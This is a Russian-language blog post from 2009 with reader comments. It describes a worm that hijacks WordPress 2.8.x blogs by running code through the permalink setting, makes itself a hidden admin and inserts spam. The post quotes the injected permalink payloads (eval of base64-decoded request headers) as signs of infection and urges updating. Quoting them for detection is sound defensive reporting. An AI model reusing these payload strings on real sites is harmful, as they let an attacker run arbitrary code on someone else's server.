Эпидемия «умного червя» под WordPress

Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. Сразу же вышел WordPress 2.8.4, устраняющий эту уязвимость. Как оказалось, далеко не все блогеры следят за апдейтами.
В этот уикенд разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы юзеров и начинает втихую добавлять спам и ссылки на вредоносный контент в архивные топики.
Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие нижеследующего кода.

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
или ошибки
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’
Если есть такой код или фид сломан, то блог инфицирован.
Процедура удаления червя представляет собой нетривиальную задачу.
Кстати, Мэтт Мюлленвег разродился большой статьёй на тему безопасности, в которой призывает юзеров постоянно отслеживать и устанавливать свежие апдейты, вот инструкция по апгрейду WordPress. Это единственный способ обезопасить себя от этой и будущих эпидемий.

 

Источник

Похожие посты:

  1. WordPress марафон #3, “Бесплатные” премиум темы
  2. Встречайте WordPress Server
  3. WordPress 2.8.1 уже скоро, почему?
  4. Вышел WordPress 2.8 Baker

8 Комментариев к статье Эпидемия «умного червя» под WordPress

Avatar

enter

7th Сентябрь 2009 в 19:11

Подскажите где найти подробную инструкцию по устранению проблемы?

Avatar

Wordpresser

7th Сентябрь 2009 в 19:29

enter :

Подскажите где найти подробную инструкцию по устранению проблемы?

Странно, но никто не пишет как избавится конкретно от этого червя, сам с этим червём не сталкивался, поэтому ничего сказать не могу. Попробуйте спросить на официальном форуме, русском или английском, если не трудно напишите удалось ли вам найти решение.

Avatar

Wordpresser

8th Сентябрь 2009 в 12:56

@seodummies.ru
Хороший способ!

Avatar

enter

8th Сентябрь 2009 в 18:30

А я удалил, через phpmyadmin, удалил просто подозрительного пользователя из таблицы wp-users, у меня их не много, так что его вычислить была не проблема.

Avatar

enter

8th Сентябрь 2009 в 18:30

Или этого не достаточно?

Avatar

SharePoint Developer

11th Сентябрь 2009 в 18:32

Спасибо, что осветили эту проблему, я даже не слышала ничего про это =)

Avatar

ITiKL

24th Октябрь 2009 в 04:23

Появилась новая версия движка WP 2-8-5.
В ней все эти проблемы решены уже?

Avatar

Wordpresser

24th Октябрь 2009 в 20:05

Уже давно, со времён 2.8.4

Оставить комментарий к "Эпидемия «умного червя» под WordPress"

Наверх